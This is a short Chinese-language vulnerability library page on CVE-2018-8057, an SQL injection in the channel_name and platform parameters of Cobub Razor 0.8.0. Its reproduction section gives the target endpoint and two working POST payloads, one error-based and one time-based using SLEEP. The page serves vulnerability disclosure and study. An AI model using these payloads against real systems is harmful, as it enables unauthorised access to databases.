CVE-2018-8057 Cobub Razor 0.8.0 存在SQL注入漏洞-漏洞文库小世界-安全文库-NGC660 安全实验室

CVE-2018-8057 Cobub Razor 0.8.0 存在SQL注入漏洞

CVE-2018-8057 Cobub Razor 0.8.0 存在SQL注入漏洞

一、漏洞简介

Cobub Razor 0.8.0存在SQL注入漏洞,“/application/controllers/manage/channel.php”页面的“channel_name”及“platform”参数过滤不严格导致存在SQL注入漏洞。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

二、漏洞影响

Cobub Razor 0.8.0

三、复现过程

POC

> http://url/index.php?/manage/channel/addchannel  

> POST data:  

>  1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1  

>  2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1
请登录后发表评论

    请登录后查看回复内容